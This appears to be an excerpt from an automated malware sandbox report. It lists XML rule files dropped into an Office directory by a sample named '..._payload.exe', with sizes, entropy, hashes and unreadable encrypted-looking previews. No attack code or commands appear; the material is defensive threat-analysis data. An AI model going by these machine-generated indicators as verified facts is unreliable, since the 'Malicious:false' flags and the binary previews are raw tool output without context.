                                                                                                      Preview:<?xml...u.|....4f....z.....+.n..t*....z=...".=O...'.o!.q..s....f6qU......./.t.t.)...@.Ix.H.T)....?2.]...ZP..T.le.....A...........8....u.....UQ.W.,.k.Yi.....z..q......*..c.........0B.%.........W..K.....-...){. ...w..x.h+b~J.j..@................Z.l\..d^....u..}...4v.2i@ .5.e..!..$.A......@...2...MT.W`...<8..q.....Q...=/+93|..,.w.l..$..Wq...J.$H...,..~q7.. ..T..0.$.....cxri.#F.Q.:..9P..iB.O.....4G...U....}J.Z~..]~Y..BgY .Z.M.asq&.g/..R.\g.y.+.V....C.R.k..o^..r0.%............y..;.7<.,..J._.(...!&.AqB...rs.eP!..o. ..*.*.@l^G..pX)0...=..@.@........#....!..C.0........).0..Jy....+Np......}6.C..D"[.&..hyv.=..t&..n.4[...%.....|.+...l]a1*....Dr.e..F......k....P0..._.\..s...b..5..5J?(4..(.t../.......R...#.t2g.....H,.9wV.C.u..}sPYjC..N....kH..x..XC..>...$..dRyl..C.XA...]G...Z.Q.6..K.>d.b{..-p9..=".C.S...)..ni...Y....4SNZ.....03..y.).3m.NRA...h.hq...vN..j..z]."V2.)DU[=Sr......m.......{.oS...D.8.5.8o.<E..(.m^. ..'V...4{.N.v..&j$*.c.{B..@..g.......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701551v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1738
                                                                                                      Entropy (8bit):7.866727107908646
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wnw9l1B3ABOMpw8fj0WIF7dueZXRdUsBwnluTrQZ5o714qVlmL33In1R4pVYGcA6:UwnVN8Q9elQruK13VsDPDrJwD
                                                                                                      MD5:06E407A0DD1BB456773A853F55CABE07
                                                                                                      SHA1:4796198FECC8E986BA2EC53FF9208B362FB76021
                                                                                                      SHA-256:91FBEE40A8FA172440A0E45A2508B4BA894CD5F1A6E08585AC7D992B6D9D1C37
                                                                                                      SHA-512:226708BB5DCD4184EBC4EFDC231A5544DEF3F1B60FE99A646C9544D9434045B3AF0FFB39BE32638FD6A5842BA11F708B0B57090A11C09BF50529D2B468070FA2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmltY*u<.Z.|..+.F.B....Ux....j..O5W.%..~..?1....}:.K...i..{.0v.....dXi..|..8o.j ..x..Vbtd....3.1.?.L...[.z..2..7.i...u......%......y"......T.Mz..r...Cn.;E. q.}%t....G.Ff..G[............]..x...../%.:.*MX...)...H.n#x..B...|.......YvJ3{.3....tn...-....'..z[.........:<...;`......I1.x...V...p........h...0.......C...T3......W......[.B..t....."...]?/..k...NY.o.rZ.t^t.1K s....0.W.{.cPP{/....y..R..'=[.p...v..QB.......xx..Q..#\;R.....H...4!-..t..|]..Gkt....../.qFO.yA..M...N.dc.n..z9.6.h1..x+p..a.J....O...7...C.M7v..-.?.N.tW..%....y..u+q!...db?.9i&B.8........z..Y.....*.C.\,...I...M.a.~be.O.._A.........*..{'...D.<].....6...........?.ku>.x....D.s.pQF...q....8.]..|F4w....Q.........i..qr.C.1.}+q|5h.k....P..R+..|.9.O.......k4^A....a.....&.V..O\_=......J...5...u..c....9.Mk..k..iZ.Q.av..CP......7....=.'6.b.k'k..l....r..r.).W.b...9l......R...$#.\.)...k...S...qy.y..G.,-%vR.w.MH.[u,..+n.%......|.0...yI..t..+O....*g....*...6cZ..>......jm~/.^..l..}C...X..,.j....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701650v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1705
                                                                                                      Entropy (8bit):7.894191794251838
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ze/ZeuxeVuo0jiS5p+w8QHrAjL67f6kfYyUP/mXTBvhVGk2I+WThoEQ1uvh4ndiH:4sgoOV5pPr5Ydk+WQhQ4vdlzwD
                                                                                                      MD5:380CEE59B01A2A35ABA251ECCEA121A4
                                                                                                      SHA1:7CA0D0BE651E11EBC2AE7AC679C3EA485EA55636
                                                                                                      SHA-256:DBD36E016D602B498E888CA64AD0664666B3C6F44FA8A25CF477992B4F0F4B24
                                                                                                      SHA-512:3E6D22E996CA43FF7B7CD570D2F5649878EA4CE42CA99D32DF09D3B22DFA408EACFDCAB224D93F5329877C4927EA2031FB119F8E6E595C7C2D9C75376767EA43
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.lsN....."..b.W..p6...[..........*..S.;.U..p..Ae.6.W...Mb..."wa.Sg.|...m.d\..+`I...(:{F...gi...7..%...m.;KF.>..)........._.03/.5..U.h.H.=.V3k@&...G....B{.k0.Y\D.[........l...Y."..b.Q>nH...k..O....'.fy@...G..j.L.Q........x......e.g9(..u.....5.K.nok...c.\.9......g...V.....#..=<..*..:".N.....(.2..~+....H....v......./h.H\..vqE.t/.OlII.pe........8.....m.~5K..!7.`..........<..0;...0......*c.5*..3...4...-?...,..4..C.......E..f.........r"_x..S_h.....v..=.A.&).Q......?u.....H.-...$.........`<.V...qj'v..K.../..d.tR...^f...{,.x............B.n.f.Gr1CzM..|.#%...ur..x1bFyM[......m....."+;>5l.."..`......)M........-..q..........&.....y...%....W..:#.u.............".W..;.l....r..[..K.f..v.D.Z....`./..uc....P...%...lY.Jz.9...$..... .b.......s}.X+.MG.!.6...%.......l.8.6.............\$..n.....7...@.Dz...r..`>.....M.6.t..,.d..\.1.....E.........|..4..P.....;lg..;...0CQ.H.V..e.-....6..g......$.......[!S..s.@..0.B..=.E.L..z......:[.8....Uq._'Q..a.._..Z..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701651v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1742
                                                                                                      Entropy (8bit):7.8852449322570575
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:3kGkUtKEPiXraDodP06F0VBbh4Wti0xuTEE0q2tnwD:0fUtK8yr2oh06F0VUfA80RK
                                                                                                      MD5:0595BCD2369D0C16C98C63ABB3A9F750
                                                                                                      SHA1:FB587DE7EECFC6E2C80677B163A47586E5346917
                                                                                                      SHA-256:7EB23FFE07A9885FFCF201F3E1A6457132B2A8DC8991BF28AA03550993ACBA3A
                                                                                                      SHA-512:447FEF2A187E222D8192E99C15AC87BB0094E8E56BB243F919423E726A6DDCFC477A2E841CDC8F5844A92D0DE7E4E66CF2D79D9ADE931B344306080C17A96379
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml%..q.."W.p..~.h|....p$..1.:.<..+.H.+.f.u......;QVw.5Y.....R... ..sF....2.}U.~.-.... 5...L;../..P.9.%..........p..;.....%.t......?.q.$.v.b(./4......I,...~x....!l...X..8\..@..E.....D..lK..0...!......'...Hm.....B.[-..........y.dW...2.:b.;.j...0..7...\S.n.@.:I^.=`.l.%.R..2\......!.U.p...P..4.....N.8DX...6...r.N4...g.\.$u..Q....L.JR.m...t.v.F........yE.%@.......Np..q6...%...,. .....f.Qa%+.-....J........-.H..&......*j.n..+;....Uz.....H...+..q...v....y.....B....|..-.%(..#.(Q..{.E....*.g[v4OG..(B1U..J.D4...n.........G=...Zc.0m..C..T..nM....5....W.>.H.Jb.....>A....iknoD2*.q.Oi......&..o.H.T.f..}=eg.^|.2.F....2a...ph\.Mf...hs.0..%.Vea.........1_..9D.j;.-.W.I...eEY..........|......f.$.O>.~..'..l.)...V/k..a.n.@Vm'.gz...2..PM..../0...x.7 ;..Z[F.....9+...u#8.Zop<Gc.[ry...`-...r..J..*iRH9K..n..h.e..z...@....z...4o....s+...3..D...;....sV.j. ..C+.J.....b..t+...Iy.?..M.L.....r_...>..E........6K)..._...=T...z.").......%@.HG7......l.R.uE..ec.C..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701700v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1719
                                                                                                      Entropy (8bit):7.884187577166536
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:85tjJw6V6TTLdaAO10whwtOWu3frTMc5fwD:t6VavdaAOqYwMd3frz50
                                                                                                      MD5:286772D89099F1A55A1B98F6F318DED1
                                                                                                      SHA1:E82EA73DA8F65C66D8F5C9646B87CE353DF50CCB
                                                                                                      SHA-256:7112B61A63DD7F67B00AC3BE3BE2A74A0E8A98804A48176F86C30F0F24A330F7
                                                                                                      SHA-512:5B45989EA77AB1916FB3D5EE84E1379EF173CDFD7CCBBFC8BA0F5FE219249A24782BECBE93BD8C528E2FE725F307E64594CFB3C9254907F57226A5C81E38B087
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml."........}S.U...-.....](.H..q....\OK]r..g6..~.vQ}.....+.r..sPI.0...i.BW..p.;j:.ROp..E.[.........^... .mq..b......t.....=.d]uQ.g%|a..?...6...t......#..a....,.y.p....vz.}C.l....F.3@.q.r.:K.0....0..k.7.*...1..mNB...`.\.d.P{..X...9t.1.Z...U.D.3......'..~.~.l.D'*4...^.........Tb......y..'.3.q8..\v..=.b....dh..=.".C.I....l.|*.^.4.>..q..P._.......6..h.sN^.:^..~..`o.4.o..T.-8....Jw..\2..>.....('.m...IkS[...C...jp...............|.?/.OF.f.o.n....I.i... .F;O...e.05..i.\..cM....~.........`.o...RH...[.H......}.....C...I......P@gs..a#}OW.U...y...\R.R.K..x..8.&.....y.&.p.^'.....j.b8: ..`x.V.i.......9'.^.`8OM..LN.....#.RV.?d......L.y.JI...4...Z.C.kx...:.`..,u.Fu.dh_........eOC.Z.m.+....Y....C..r..[&v.i.....n.....\...x........Wj.........x..s.Aj.m.6V.-d..C.r...~...pw.".~...R....BX....iqfo.......tM.L.8...y..6.h.N"....2)...SW2... ."......T+..$.y'b.lFX...+.~{..A...i...V.+O...BZ.Q^....t......z...c1..^.Z..d...J.....-......nd..ZM.{.$..R..4OK+...B?F

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701701v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1756
                                                                                                      Entropy (8bit):7.8781825282942135
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:WW3m0wVpLCtXvLxoy8obXtPx4izL4VNbx4wD:WCaVstXvuWXM4idB
                                                                                                      MD5:994F8525D35E5D051903408A1D2E36B4
                                                                                                      SHA1:6364F83F3F218EB2D34E48D3C9C772AB286C63AA
                                                                                                      SHA-256:153BEB9E6808BC80A4A1FE0AF0D449C54EA0CAE33CA4962988700961A3CBC5AC
                                                                                                      SHA-512:36617A7FB78FFA34243D53311131E42CEDA50B8618D6B12561175E238A654142076AC857C64192BF6E061678ACEAD1C39CFAC2F48F26CF8A590329D579509869
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....9...Z.....W#......i-..\6...`;{.....K...5I1/...O....B.......b.-A8I.Lo.....%@....3.96.....v..b...%.y>.rA.....?...6....w'.T....a..;..F......C9.^. .sg...Y P;..F.:...*/).6.I>...7W*..:o......z.......]...^r.0Tt....Q..1E..W../g.'.*.F...'.J.._.T..$..J..R*..B.l,...6....g.......S..2..m...K9Rw .I.....gv...)..fP..N.......W.b`.$.]..{...Ua.O..H;gh..E..<.o..k..p.A./8AO^..)..'....1..o.N'.. .Z6.!&.....Z.@..[...K*.m_H.x.{TU....b..O._..!Ho3..Z....u..14y....|.Z0.A.G$bR"_...Q0....U^.t..4...v._.5[.I..x.....[...\V..<....g..V#G.tc...AUL.K.6w1.......*...oUA...3Q..z..p,...c.........a..".4.............8..jzx...?.._.N..J..a.}....m.N.3:.].gz*..E..'.c.."...T.j.-. ....@FK6D". l.D7t ...YQ&...w...I..YD....v6m....$..Wa..p+.G........+.n..i}.t.F.It.?.IKv..,..f...rB. . a.v.hLz.~...p."...z.?..H.|@X..4.p.oMt...X.3.....u....&..HX'Y.t....o..J...`..9s.'...7.A..+.yZ....ya.T%.[J.s.\/..1....,....D...]..6W.. .o.........I.9An...X0.s...e...cN..g"......?]t......`.z......D...u...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701750v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1697
                                                                                                      Entropy (8bit):7.873733349228899
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:7035sZopNyWSy7jBbITapw/HduN9XWz/DpAlqIYWYmgPNxiv6bD:o30rYBgapwgNtmL8qbWVUNMwD
                                                                                                      MD5:2901123C8E74A9F4804552CA6A3C801E
                                                                                                      SHA1:2F04904E9C23AC3BD4B7EBC35F883CCF820432DE
                                                                                                      SHA-256:E81F51DD58E0C03BC75DD5BB6967E69BD0B16C0C9F166B32B1021B003B92124D
                                                                                                      SHA-512:853445FEA6442B7D70F11D609908730AF3FAE52BFA9AD227C0833F05E9ED81C000CD2EEAB01D2FFA9DD3C0EDA080709E9993C971CD3ED1B37EB652F8DB2B8B5E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlV...mYT......X......T.4..--.G..;...;UY_.-......s.N..1.vy.S.`.....7q.Gp...d.6LY..%:.y..F..'..(T.f.....Bv.V[..*S..3E{..d\..w..cYD^1H_.r. #(B.S..H.1%...wLZ6.J..U.?.E"B8+.F....b..Y.JLp..:. .;W..E.i..).p..,yp.-".j2......]'C.lZ.......h_....l......j..f..:..+.9..Q...t.......z..b..7..R.B.....c....S......}.F...O..6z.,..=Zau.~.............=R........ar$D.h.c..^...Co........4Dq......F.*u..k9....8..a.v....*..(&.h;.C|..P..(....8gA.e.Mct.+..qZ.R..{....5Yn6D..\X..e..R..}.Bb.......jR-...0. ...).....1..T...@."<....?w..RF1/.../..).X...Y.,&.-.{...{..~R........-....g&..>....[.....|ss.G^{....a..2v..B".D.....xN.....3..MP...Q.....}D.`...Ydmz.J.O>...\..~.i..PM..3.m'.....'...qv)/)...#....A.\....Hi.k...r.....m.....h.U2Ey..Y...{O...n..]4.N....zi.....Z1/..2.r+9.y.q"v.x...}.$s.M.Z.u.........`V...g..+.$.+.=IBU&..wM..+.38.D.,i.v<.Sb.qc..F...`.7.......7k.2(....'p}J.u.'.S..}8.;wSz=N.(pFs...T.......~9t.P../i....0Ks^;....Eir-V/.N0l...6<.DiM.......B..O4..<.si.m......WI}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701751v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1734
                                                                                                      Entropy (8bit):7.889424223605202
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:U98FxEYw3nZClAdirJgWsXA8FUwUOTOm5XrSmcKN/8aqwD:UW5wobiWsXrDU0bpSXKf
                                                                                                      MD5:994E7A258AC8F360F921DA2F65F53950
                                                                                                      SHA1:617455BE6E9194375380B0689E86535311CC8649
                                                                                                      SHA-256:09A140C045F7362B617F6AA706AD458818282AF2F715507734E214A04BB1EF64
                                                                                                      SHA-512:DE2EB37281A0A95E60DAF756D9A6244E5CC4C72E2D49495FF35E611BD50CAD24FFFB5C708C40C1D1970203BF1D00D62AE5504E9BC488D088024281675DAC34F2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...........QQC@......!...o...ph.Ak.....*.....8D...9..9y..v...vdE:....L.....Y.....R9....U..Y....k...4o#].,...W]...9..d~._w..Y...p.>5.....-T.z....U3.'...LP.+q..J.x.....D......\g.y.....!.r>.ay.7!_F}..H!4.)t.....1{..:..0.1`[..A`..-....sT..H*........8.5..6.]s.N.?SDm...N$..[..j...-4*,u....Fgd..........,...)..P..../....o).Z.\.u.T&.T.. .2a...-.4..O....:.......#...p.Y<.q..l%.E..O..%,s.F...D...:...Z.>...=..Z+..p..7..}_. .9R9....j.-.C/.k.mq..m..<...@.5..i...=.....4.1...B[.......LS.;.......u...AP.....x..<..g.......C1..4...#inG.|V.<.5HcD.9.a...r.._F...z..]t+.a.R.......f..d..y.e.C,..s_...R.....f#..M.6..). .Y.....>t.K.....M.p....7I..4r..d.."Kt.....J.R..7.fp.4.Q5.....HJ.n...L.........%V ...q.....OK...W...K2....x.o..q.....O6...[...J......-...`.W..z..f.0........$..F.5r.W_.3...Dg.6L(.t.;...C...eQ.S..O..S0O...,vH...M..y`G.'q....6..;g:.M.O.!.."..>.Li......O...C.q.oO...6%.....2..l..J-C...E....=.q.U.......o.9..3...{.....hZ.....a.]..h..?(%...[.#..i.urK....e

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701800v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1699
                                                                                                      Entropy (8bit):7.870821369802355
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:HmSOpYW+Ihmq0JO4SFDz63lRN9hEFiwkxXEfP2hqwD:D/W4qZRfOv9hakZEfyf
                                                                                                      MD5:2D5645BA23822CE0F14F039B40A5499B
                                                                                                      SHA1:8D265F88209405582B0A4E4ECE9B9EE46E1F6282
                                                                                                      SHA-256:CBE0012EF741A8655C1A5CE9A9340E2BE5FCDC0B2A6187E38401C4C20D43A26F
                                                                                                      SHA-512:8888129F6F0362AB22B7C4D3CD0757FF2F8B6CA57B04E9FD865C6A19DA94E4FC8C8C9F0BA016E8B4B70B8BEAFB5CB388DFADC8A0D0F810C3660E8BAF346BA972
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.H!..-. ...Y.5.]..}.!.7.I....:....a.ND.>.o.{...9<.2|.8..G6W-.}.Y&.T....MRv..l.SS..-.pc..@.o...5.f...*..H~p..d;z;.+i...@+{.<.."..j1.%X...X..,k=.........r'..9.<xW@.._.P............q.....=..e...S.u.'.:...1.\..l.$...D;....?......Yb.Y..'.{..W.....F..s..3...t......p.Z..^.">.d..............F.8FfEO@1.A..Z..x"[._..%B.M...........m#...B...n.r.K\.j..|.;..3;.^..;I0..^.^.g.G..8.C....x....{{\....(..Qj.....I..-.R..@..l'.Y...\..l^...\..-D.........K..|.......(...O.v..XG).]....^..z..>...S_'Y_~...P7*..(P.d..GJ..2..D.;........(...:o.0=....E.;.\[..6...&.\.)T..!....CP.@.....i.....?`...)k.]iR...E.x.......j......V.*..xS...q.r7._0VH.G.m.....-....s^.Z......j..IW......m..Q...F.EP....W^;..h.PfC....?.:^..SY.$....Z.C..f$GVo(q...}..@.zS.g.s."~..E.Q7..t*'.8G<..hTi..Q>...P.K.Zs.Z.c.......!ArL...d.*(./..&.cHW...v...N../a!...E...X.y....X.F)l..... 5.C6h.'.).G.K....3.."..8.w ...x....;+.....-).M..h..........L.....'.....1XO..".FI...Q..fc.,!?.ZmeE...w.:.b.t. ..j..2...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701801v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1736
                                                                                                      Entropy (8bit):7.889906012256799
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:XeHBM9JFytHr0JIvQSngXs1ekodCTZZTkWawD:XeHBjHNvQUYeekosIk
                                                                                                      MD5:F1018C800BCBD59E1BFA91F578B1BE61
                                                                                                      SHA1:CE8E9FA704CB23A715C6252C374F7364CBA309AA
                                                                                                      SHA-256:F0A2A057700326AE2FC5A8410752A1AD62B76BF03B32767F97B4A2FEFC8EB02B
                                                                                                      SHA-512:17225A1D395A98CC8746EB9BA783A95CFCE88898FDF46C3F2FD8E1AB93A871A7815A7B280E141886286CEB4A5EE997F2F33450474E6D32549630C1B051FE45AB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....FG...>......./....E."?^.C'..,.C...,.........\...;...Z1......^....._.q...}.....jF......-W.T...B~...g.M.[}..Q+.M#';|.>..n..[.k......z.VE4.......'.w.-h.L;.F.[....xi.0.a-3..i.oDA.3/..4..\.O....>..?..3!...b.X...j..ujL\2i..@c.u.....2...l.......7.mo.}}.f....@..+..h.r../+..\.!...vwx..Z.g..t.Sz........?K.,;.$..hK..g.:.6ggzs`U.h......UN,..1....3/..p............`..`.EO0K.1.....]...H....D.....w.{...x.S.....3.~._M......V}&....5%..q.....!.Xg.1m.4.+F.!.m.d...3...t.,l..V.W...G#".y..Q.[.......`e..B..q=...}j9._[..N.....h..H6iiG.[...g..^.m.>..........[D....m;;.,....E..o|F.}..(....:...}!)...V.Wp.j;Q{...9x.....S..~j9.....:.' *..K...R....'z..<.F.!Y....i.....HD`....U..su..&..xn}....b.p.R....|b..?..r..ws.......t{.@1.W.....9..1....ux.;k.$.<Z$O|.y..i...mFE.G........;<.1.s0j.>./.<4 ....*s.]W..;=.r....m..z.....u.<...r.?t.^."...H..H/z..>.......h..&s$x\..=..z.q..E..iC.t..N(9..........j.........Z.I...@.oYw9Ja..S.y....v....cQ5.z..>..!.XO.....G..2...u.\..N<[.f

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701850v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1704
                                                                                                      Entropy (8bit):7.8759724968681715
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:YOD1UB/CBlujH7+5B0616phq4JkQsiPAMOwD:3b0TK5BbMw4boK
                                                                                                      MD5:B8071C0EF28E329B73FEB9862633DC03
                                                                                                      SHA1:8EEE31C364753CECF98BE290E7F3CB1D61EC8A8F
                                                                                                      SHA-256:1B726A07C6C8A2C947E7B91021CA4B15DF70686AF6C81A1C2D2565F5FCFECD7F
                                                                                                      SHA-512:7C4B61A8382CF6CA11747FB34CE1B65E12E2935082B33742F0F1391875D3F3085D185ACD6B76AA2AC4E1F0CFA16A91CE706F9CB3292E4A9D6AF893477FFE2D82
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.]../..3....eF.`\....n...j..q.7g..Z.4-cZ. V.!..VcCh....V.b...../=...p..\..n.^dA....d...]i#...9.Ei...c}.R9kB.{.X.5.K..8.......%....3.....A%....yna..N...].N.j.8..*..4T.{.-YW}...|.....u...1<....-...B.ru...]..#.|.t.\.41.w(..&a..........1..o..\.\./.J....S(d$.Lw.....MP.^..M@.........~.4^..).......A..E...>.|F.u..qX+:...BoQ..z0.Z...lZ....8y.hXk..p....P..-.9...).f?`...t.z.K.x....].Oz...0.<...DM...AIC.H..8..Q.7.......P....Dp.Z.........B.jG.....|j..hKQ...#..<G.P......C....... ....z.|,..^.NV.P......y.YA:^....x....W....F..#...w.0...2.......z..V 8..u..>...M....l...G:.C)H...:P..o.B..r.....2...^.#4..|.._S(.Mw .M.....tu..r=...]Ab.4.^......w4.}5.t.;(sVDx.e>.......L.~..[(.y...EN..t...i....`I.......cZh.u..n.5q5v..H.......g..,.2v...N....._............0......rn.....m(8.^cU7_Uc...7...> .Yi.1.9..!..w....&..~....F....K....\.~.'....&....w*X.............j.....C.s.....?..gD.i.........T7....v......x......zY-..J|...lH..R.<....N/t...y._...H...}....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701851v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1741
                                                                                                      Entropy (8bit):7.880216191769084
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:O/LDZxG4H781HTgawEfC9i+mqhEnuO/4wfxBimwD:kLVMi78d8hJ0qYQ8i
                                                                                                      MD5:F5AF60C775B3181752D46031CFB21B4A
                                                                                                      SHA1:9DAC6CA7879B467711F97C6790FD70B50B957666
                                                                                                      SHA-256:3B8F9EAFB7AB188AF25EAF67F5F005B5B21C7137BF8B962F8E68BED492DE1D5A
                                                                                                      SHA-512:5FD86EDAAC8835F86C11D5152673BB2FE733509379EA3126BB3BC8667DCB5DFA8FDAB7C2FE695BB0FE0E418914FE8C42BA84251D70257B6CE227418BF6FE9C1F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.X.....>w(>..+.Y..C...^.j5e...T.30.k.?H_..YJ...[.`b...l.L.<.6.M.......J....q.p.eF......D...O.}E...R.&.Ux...N.1....8./..?...t..._...X.;...D.\qy..&2.....G7c.z.>.'....:.k"o.=...t|.\R.<..R.(H.C)........5'..4o~........*E..<.m.R..>..7O...o.Ve._..&VP):....c.>..B i....*.819.Y.w]4.G.^...j.+......Q.>.>VNt...CGq..!.%U&y....u....Ghh..........cc4.M.-.:$......D&ZM..t.).'..D. 6..n....|...|.3.`n(RY./.X...*.O....9....!,.W...F..sG}.x...Z......v..;....%E'.).....}H....`..6O....#....;;q....Q...7.q..9,.$l...K]vmI..'....$.A.3V....2!....;......+.g..x|.{~.X..`.f.....x.3Yl..N.z.m.`....9. ...![...6.W*.n...$ ..o_..p.,....)..g._4..t1..i....tHR.K.../..../..z^......PR..8t:.S...^f....{.....1..ax.d..V...s&.xf..)...G.R.....Ke....C.].d....^....b.r.W._u..J..q...........6.7...NE......]~.k=gR|.._.'/..\.`Z5..&.........K.x..m.W:.....bcl..2..L.3.@0...^S.Ca....@...l..6...rH...l...%....i....nf.i.o.Udv_....Sg...H...W..S.%......tO.$.x..U.Dw.iZN..cN..uq....l.S>.st.:.:.>....:.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701900v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1703
                                                                                                      Entropy (8bit):7.899581640287226
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:CfPCOqgCgZXYC4B5nxgI9zMjXtLpGNF62vwD:CHZoxBZxT9wjvX
                                                                                                      MD5:ECBAB448FA63CA72595E7966923B4E71
                                                                                                      SHA1:51BCD34E8E48E08CCCCFA2A8F6A70B0E84C7055F
                                                                                                      SHA-256:020D8E26C37A7B9D64E9F2A72ABE796BDA4FAEBA8E802FA83DD59721AEEDE76B
                                                                                                      SHA-512:F7AB2EFBB1F895133831DAAD7C3DE753418F978B98005F72024FCE263FD30E1802CC27D4AA9676A20B6371B92B47BFC903F893E41292D2C5C8F95D5E01C17589
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...z.Zu.........V..'dv.....[Y....g..b...N8.GQ...V<...>...s...&.{.5O..n.......u^..N.JL3,.[z.!....6..W..u..2=.8......u.2.7..E%.F..9.NAl....P..WI..l5.dI...}.S....'a.pd....l{6io...l8....q5.:E..q"z...j..f..1Y{_?s..H..aF....\.Xi...+0.#d..E....K.i..Jp;...q.F,>,..-..r.....X..k#.....,q. '...3./d.`6hv...+.,IG%zl.nc[....A>._......b.s..$...B.3....b.h@...$.M/.J.........dTe.R.s.a..~lz..Y.l ..X...D|.....ux.e.).).../S;.>..IW^.....Ait..<...N<.w.".w.!.0....:.|_Z....A...`.....mo.K...`.4..t.}.$....N2G:.J.:#C...z5Oh......,..j.yG.q.iM.ST.7.8..K-N..~.)..,..y[....%X..Q..f..D............t........ku..L..l....?...#v............O.......SF.Z.F.[..C..V.3..J.w.l.d.PC..kN.....-..q.H...W...Z'&..=...uh..H....^..M..}.t...@I...?..U.......;.c..jD..W-t.......T.....7.^3..H..$.ip.{<...m_KGa.7.Z.....6|..(I.uB&i..Wa.5./-.....Y.LS(......E.u4..I..?.]bY.._.....t>....|......*..KG_.......P.H.....".!FLf..&...U...?eo..Cm%.f.*.u...y......W...eZ...m..8.7.n...W..y....g<.j.b....D...w*....{.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701901v1.xml

                                                                                                      Download File
